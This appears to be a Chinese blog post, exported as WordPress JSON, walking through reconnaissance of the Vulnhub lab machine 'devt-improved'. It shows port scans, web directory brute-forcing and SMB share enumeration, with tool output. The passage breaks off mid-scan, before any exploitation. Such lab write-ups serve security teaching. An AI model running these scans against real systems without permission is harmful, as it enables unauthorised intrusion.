{"id":448,"date":"2024-03-23T20:25:01","date_gmt":"2024-03-23T12:25:01","guid":{"rendered":"http:\/\/162.14.82.114\/?p=448"},"modified":"2024-03-23T20:28:07","modified_gmt":"2024-03-23T12:28:07","slug":"vulnhub-devt-improved","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/448\/03\/23\/2024\/","title":{"rendered":"Vulnhub&#8211;devt-improved"},"content":{"rendered":"<h1>devt-improved<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024726.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024726.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323183815219\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024728.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024728.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323184903961\" style=\"zoom: 67%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024729.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024729.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323184931919\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u6765\u6ca1\u9519\u4e86<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.37.131 -- -A -sC -sV <\/code><\/pre>\n<pre><code class=\"language-apl\">Open 192.168.37.131:22\nOpen 192.168.37.131:113\nOpen 192.168.37.131:139\nOpen 192.168.37.131:445\nOpen 192.168.37.131:8080<\/code><\/pre>\n<pre><code class=\"language-text\">PORT     STATE SERVICE     REASON  VERSION\n22\/tcp   open  ssh         syn-ack OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC\/0O8beKKMGvekLefDRWa\/MVhJwXr1B0PuQHDt8xlqKcpvdLCO6b0c+sfcemEq7m92V82fTy2BAvvkk9GZSQ+OrDfWzB1grIl6t9ndVBB++rz\/rZBwmZ\/VcSBLSwjRAnrHRiyCtunxDiWYwD2htq5FV2r4K38+YrWARqpapME\/K\/atz9Txxe4WwzihPB+910b0dG4JAn8hXG8VHZsJvo4qV0\/yEcSgwD9B4QV6XK3uxOnHviWUEJTOHU12LAz39KYj5Pir9BmSsfrbDgt4s06zR1RqviIF+GIJkbeWR5V5Mn9CazLuPmyrmybsFEfFMh5VeDJ33eCeGLhmHYoGEJ6p\n|   256 c2:b6:8c:36:a6:dd:9b:17:bb:4f:0e:0f:16:89:d6:4b (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ8C4BDQAOCp2TfWnvOmYyiiiYDe5ub2+NvCAkNWcXgavJtZUsBxXlTLhGWk2omUZtQCq4Tnb+BymEvKz8IKYXk=\n|   256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILvQyP65\/4gxE9tbpAIijwT4kwjUtquJDVqd3+iNB0pN\n113\/tcp  open  ident?      syn-ack\n|_auth-owners: oident\n139\/tcp  open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n|_auth-owners: root\n445\/tcp  open  netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)\n|_auth-owners: root\n8080\/tcp open  http-proxy  syn-ack IIS 6.0\n|_http-open-proxy: Proxy might be redirecting requests\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-server-header: IIS 6.0\n|_http-title: DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!\n| fingerprint-strings: \n|   GetRequest: \n|     HTTP\/1.1 200 OK\n|     Date: Sat, 23 Mar 2024 10:50:55 GMT\n|     Server: IIS 6.0\n|     Last-Modified: Wed, 26 Dec 2018 01:55:41 GMT\n|     ETag: &quot;230-57de32091ad69&quot;\n|     Accept-Ranges: bytes\n|     Content-Length: 560\n|     Vary: Accept-Encoding\n|     Connection: close\n|     Content-Type: text\/html\n|     &lt;html&gt;\n|     &lt;head&gt;&lt;title&gt;DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!&lt;\/title&gt;\n|     &lt;\/head&gt;\n|     &lt;body&gt;\n|     &lt;p&gt;Welcome to the Development Page.&lt;\/p&gt;\n|     &lt;br\/&gt;\n|     &lt;p&gt;There are many projects in this box. View some of these projects at html_pages.&lt;\/p&gt;\n|     &lt;br\/&gt;\n|     &lt;p&gt;WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to patrick@goodtech.com.sg.&lt;\/p&gt;\n|     &lt;br\/&gt;\n|     &lt;br\/&gt;\n|     &lt;br\/&gt;\n|     &lt;hr&gt;\n|     &lt;i&gt;Powered by IIS 6.0&lt;\/i&gt;\n|     &lt;\/body&gt;\n|     &lt;!-- Searching for development secret page... where could it be? --&gt;\n|     &lt;!-- Patrick, Head of Development--&gt;\n|     &lt;\/html&gt;\n|   HTTPOptions: \n|     HTTP\/1.1 200 OK\n|     Date: Sat, 23 Mar 2024 10:50:55 GMT\n|     Server: IIS 6.0\n|     Allow: GET,POST,OPTIONS,HEAD\n|     Content-Length: 0\n|     Connection: close\n|     Content-Type: text\/html\n|   RTSPRequest: \n|     HTTP\/1.1 400 Bad Request\n|     Date: Sat, 23 Mar 2024 10:50:55 GMT\n|     Server: IIS 6.0\n|     Content-Length: 293\n|     Connection: close\n|     Content-Type: text\/html; charset=iso-8859-1\n|     &lt;!DOCTYPE HTML PUBLIC &quot;-\/\/IETF\/\/DTD HTML 2.0\/\/EN&quot;&gt;\n|     &lt;html&gt;&lt;head&gt;\n|     &lt;title&gt;400 Bad Request&lt;\/title&gt;\n|     &lt;\/head&gt;&lt;body&gt;\n|     &lt;h1&gt;Bad Request&lt;\/h1&gt;\n|     &lt;p&gt;Your browser sent a request that this server could not understand.&lt;br \/&gt;\n|     &lt;\/p&gt;\n|     &lt;hr&gt;\n|     &lt;address&gt;IIS 6.0 Server at 192.168.37.131 Port 8080&lt;\/address&gt;\n|_    &lt;\/body&gt;&lt;\/html&gt;\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port8080-TCP:V=7.94SVN%I=7%D=3\/23%Time=65FEB40E%P=x86_64-pc-linux-gnu%r\nSF:(GetRequest,330,&quot;HTTP\/1\\.1\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2023\\x20Mar\\x\nSF:202024\\x2010:50:55\\x20GMT\\r\\nServer:\\x20IIS\\x206\\.0\\r\\nLast-Modified:\\x\nSF:20Wed,\\x2026\\x20Dec\\x202018\\x2001:55:41\\x20GMT\\r\\nETag:\\x20\\&quot;230-57de32\nSF:091ad69\\&quot;\\r\\nAccept-Ranges:\\x20bytes\\r\\nContent-Length:\\x20560\\r\\nVary:\nSF:\\x20Accept-Encoding\\r\\nConnection:\\x20close\\r\\nContent-Type:\\x20text\/ht\nSF:ml\\r\\n\\r\\n&lt;html&gt;\\r\\n&lt;head&gt;&lt;title&gt;DEVELOPMENT\\x20PORTAL\\.\\x20NOT\\x20FOR\\\nSF:x20OUTSIDERS\\x20OR\\x20HACKERS!&lt;\/title&gt;\\r\\n&lt;\/head&gt;\\r\\n&lt;body&gt;\\r\\n&lt;p&gt;Welco\nSF:me\\x20to\\x20the\\x20Development\\x20Page\\.&lt;\/p&gt;\\r\\n&lt;br\/&gt;\\r\\n&lt;p&gt;There\\x20ar\nSF:e\\x20many\\x20projects\\x20in\\x20this\\x20box\\.\\x20View\\x20some\\x20of\\x20t\nSF:hese\\x20projects\\x20at\\x20html_pages\\.&lt;\/p&gt;\\r\\n&lt;br\/&gt;\\r\\n&lt;p&gt;WARNING!\\x20W\nSF:e\\x20are\\x20experimenting\\x20a\\x20host-based\\x20intrusion\\x20detection\\\nSF:x20system\\.\\x20Report\\x20all\\x20false\\x20positives\\x20to\\x20patrick@goo\nSF:dtech\\.com\\.sg\\.&lt;\/p&gt;\\r\\n&lt;br\/&gt;\\r\\n&lt;br\/&gt;\\r\\n&lt;br\/&gt;\\r\\n&lt;hr&gt;\\r\\n&lt;i&gt;Powered\\x\nSF:20by\\x20IIS\\x206\\.0&lt;\/i&gt;\\r\\n&lt;\/body&gt;\\r\\n\\r\\n&lt;!--\\x20Searching\\x20for\\x20d\nSF:evelopment\\x20secret\\x20page\\.\\.\\.\\x20where\\x20could\\x20it\\x20be\\?\\x20-\nSF:-&gt;\\r\\n\\r\\n&lt;!--\\x20Patrick,\\x20Head\\x20of\\x20Development--&gt;\\r\\n\\r\\n&lt;\/htm\nSF:l&gt;\\r\\n&quot;)%r(HTTPOptions,A6,&quot;HTTP\/1\\.1\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x202\nSF:3\\x20Mar\\x202024\\x2010:50:55\\x20GMT\\r\\nServer:\\x20IIS\\x206\\.0\\r\\nAllow:\nSF:\\x20GET,POST,OPTIONS,HEAD\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20clo\nSF:se\\r\\nContent-Type:\\x20text\/html\\r\\n\\r\\n&quot;)%r(RTSPRequest,1CC,&quot;HTTP\/1\\.1\nSF:\\x20400\\x20Bad\\x20Request\\r\\nDate:\\x20Sat,\\x2023\\x20Mar\\x202024\\x2010:5\nSF:0:55\\x20GMT\\r\\nServer:\\x20IIS\\x206\\.0\\r\\nContent-Length:\\x20293\\r\\nConn\nSF:ection:\\x20close\\r\\nContent-Type:\\x20text\/html;\\x20charset=iso-8859-1\\r\nSF:\\n\\r\\n&lt;!DOCTYPE\\x20HTML\\x20PUBLIC\\x20\\&quot;-\/\/IETF\/\/DTD\\x20HTML\\x202\\.0\/\/EN\nSF:\\&quot;&gt;\\n&lt;html&gt;&lt;head&gt;\\n&lt;title&gt;400\\x20Bad\\x20Request&lt;\/title&gt;\\n&lt;\/head&gt;&lt;body&gt;\\\nSF:n&lt;h1&gt;Bad\\x20Request&lt;\/h1&gt;\\n&lt;p&gt;Your\\x20browser\\x20sent\\x20a\\x20request\\x2\nSF:0that\\x20this\\x20server\\x20could\\x20not\\x20understand\\.&lt;br\\x20\/&gt;\\n&lt;\/p&gt;\\\nSF:n&lt;hr&gt;\\n&lt;address&gt;IIS\\x206\\.0\\x20Server\\x20at\\x20192\\.168\\.37\\.131\\x20Por\nSF:t\\x208080&lt;\/address&gt;\\n&lt;\/body&gt;&lt;\/html&gt;\\n&quot;);\nService Info: Host: DEVELOPMENT; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n| smb-os-discovery: \n|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)\n|   Computer name: development\n|   NetBIOS computer name: DEVELOPMENT\\x00\n|   Domain name: \\x00\n|   FQDN: development\n|_  System time: 2024-03-23T10:52:25+00:00\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 33014\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 62492\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 23242\/udp): CLEAN (Failed to receive data)\n|   Check 4 (port 17670\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: DEVELOPMENT, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)\n| Names:\n|   DEVELOPMENT&lt;00&gt;      Flags: &lt;unique&gt;&lt;active&gt;\n|   DEVELOPMENT&lt;03&gt;      Flags: &lt;unique&gt;&lt;active&gt;\n|   DEVELOPMENT&lt;20&gt;      Flags: &lt;unique&gt;&lt;active&gt;\n|   \\x01\\x02__MSBROWSE__\\x02&lt;01&gt;  Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;1d&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;1e&gt;        Flags: &lt;group&gt;&lt;active&gt;\n| Statistics:\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb2-time: \n|   date: 2024-03-23T10:52:25\n|_  start_date: N\/A\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n|_clock-skew: mean: 0s, deviation: 0s, median: 0s<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<p>\u6ca1\u5f00 80 \u7aef\u53e3\uff0c\u4f46\u662f\u5f00\u4e86 8080 \u7aef\u53e3\uff0c\u5c1d\u8bd5\u626b\u63cf\u3002<\/p>\n<pre><code class=\"language-bash\">feroxbuster -u http:\/\/192.168.37.131:8080<\/code><\/pre>\n<pre><code class=\"language-text\">403      GET       11l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404      GET        5l        4w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n301      GET        9l       28w      316c http:\/\/192.168.37.131:8080\/aspnet_client =&gt; http:\/\/192.168.37.131:8080\/aspnet_client\/\n200      GET        1l        5w       29c http:\/\/192.168.37.131:8080\/error\n200      GET       13l       23w      154c http:\/\/192.168.37.131:8080\/_vti_cnf\n200      GET       30l       99w      936c http:\/\/192.168.37.131:8080\/about\n200      GET       13l       23w      154c http:\/\/192.168.37.131:8080\/_vti_pvt\n200      GET       13l       23w      154c http:\/\/192.168.37.131:8080\/_vti_bin\n200      GET        9l       94w      576c http:\/\/192.168.37.131:8080\/development\n200      GET        6l       13w      144c http:\/\/192.168.37.131:8080\/root\n200      GET       21l       72w      560c http:\/\/192.168.37.131:8080\/\n[#&gt;------------------] - 77s     3080\/60004   23m     found:9       errors:919    \n\ud83d\udea8 Caught ctrl+c \ud83d\udea8 saving scan state to ferox-http_192_168_37_131:8080-1711191937.state ...\n[#&gt;------------------] - 77s     3080\/60004   23m     found:9       errors:919    \n[#&gt;------------------] - 77s     2660\/30000   34\/s    http:\/\/192.168.37.131:8080\/ \n[####################] - 0s     30000\/30000   2727273\/s http:\/\/192.168.37.131:8080\/aspnet_client\/ =&gt; Directory listing\n[####################] - 5s     30000\/30000   6014\/s  http:\/\/192.168.37.131:8080\/aspnet_client\/system_web\/ =&gt; Directory listing\n[&gt;-------------------] - 68s      399\/30000   6\/s     http:\/\/192.168.37.131:8080\/aspnet_client\/system_web\/4_0_30319\/    <\/code><\/pre>\n<p>\u4e0d\u77e5\u9053\u4e3a\u5565\uff0c\u4e00\u626b\u63cf\u7aef\u53e3\u5c31\u5168\u5173\u6389\u4e86\uff0c\u53ef\u80fd\u505a\u4e86\u9632\u62a4\u63aa\u65bd\uff0c\u91cd\u542f\u9776\u573a\u4e0d\u626b\u63cf\u4e86\u3002<\/p>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<h3>SMB\u670d\u52a1\u63a2\u6d4b<\/h3>\n<pre><code class=\"language-bash\">smbmap -H 192.168.37.131<\/code><\/pre>\n<pre><code class=\"language-text\">[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s)                                \n\n[+] IP: 192.168.37.131:445      Name: 192.168.37.131            Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        print$                                                  NO ACCESS       Printer Drivers\n        access                                                  NO ACCESS\n        IPC$                                                    NO ACCESS       IPC Service (development server (Samba, Ubuntu))<\/code><\/pre>\n<p>\u6ca1\u6709\u6743\u9650\u3002<\/p>\n<h3>\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024730.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024730.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323191344493\" \/><\/div><\/p>\n<pre><code class=\"language-text\">\/\/ http:\/\/192.168.37.131:8080\/html_pages\n-rw-r--r-- 1 www-data www-data      285 Sep 26 17:46 about.html\n-rw-r--r-- 1 www-data www-data     1049 Sep 26 17:51 config.html\n-rw-r--r-- 1 www-data www-data      199 Jul 23 15:37 default.html\n-rw-r--r-- 1 www-data www-data     1086 Sep 28 09:22 development.html\n-rw-r--r-- 1 www-data www-data      446 Jun 14 01:37 downloads.html\n-rw-r--r-- 1 www-data www-data      285 Sep 26 17:53 error.html\n-rw-r--r-- 1 www-data www-data        0 Sep 28 09:23 html_pages\n-rw-r--r-- 1 www-data www-data      751 Sep 28 09:22 index.html\n-rw-r--r-- 1 www-data www-data      202 Sep 26 17:57 login.html\n-rw-r--r-- 1 www-data www-data      682 Jul 23 15:36 register.html\n-rw-r--r-- 1 www-data www-data       74 Jul 23 16:29 tryharder.html\n-rw-r--r-- 1 www-data www-data      186 Sep 26 17:58 uploads.html<\/code><\/pre>\n<p>\u4f9d\u6b21\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024731.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024731.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323191516055\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024732.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024732.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323191654701\" \/><\/div><\/p>\n<h3>\u8ffd\u8e2a\u6570\u636e\u6d41\u6587\u4ef6<\/h3>\n<p>\u6253\u5f00\u770b\u4e00\u4e0b\u90a3\u4e2a\u6570\u636e\u6d41\u6587\u4ef6\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024733.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024733.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323191853427\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024734.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024734.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323192405539\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024735.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024735.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323192513145\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024736.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024736.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323192725808\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5b50\u76ee\u5f55\u7206\u7834<\/h3>\n<p>\u4e00\u4e2a\u4e00\u4e2a\u641c\u7d22\u592a\u6162\u4e86\uff0c\u518d\u626b\u4e00\u4e0b\u5427\uff0c\u628a\u7ebf\u7a0b\u8c03\u4f4e\u4e00\u70b9\u3002<\/p>\n<pre><code>gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/192.168.37.131:8080\/developmentsecretpage\/ -f -t 10 -x html,php,txt,zip,jpg,png<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024737.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024737.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323193119139\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd8\u662f\u51fa\u73b0\u4e86\u8fd9\u79cd\u4e8b\u60c5\u3002\u3002\u3002\u3002<\/p>\n<p>\u518d\u8c03\u5c0f\u4e00\u70b9\uff1a<\/p>\n<pre><code class=\"language-bash\">gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/192.168.37.131:8080\/developmentsecretpage\/  -t 5 -x html,php,txt,zip<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 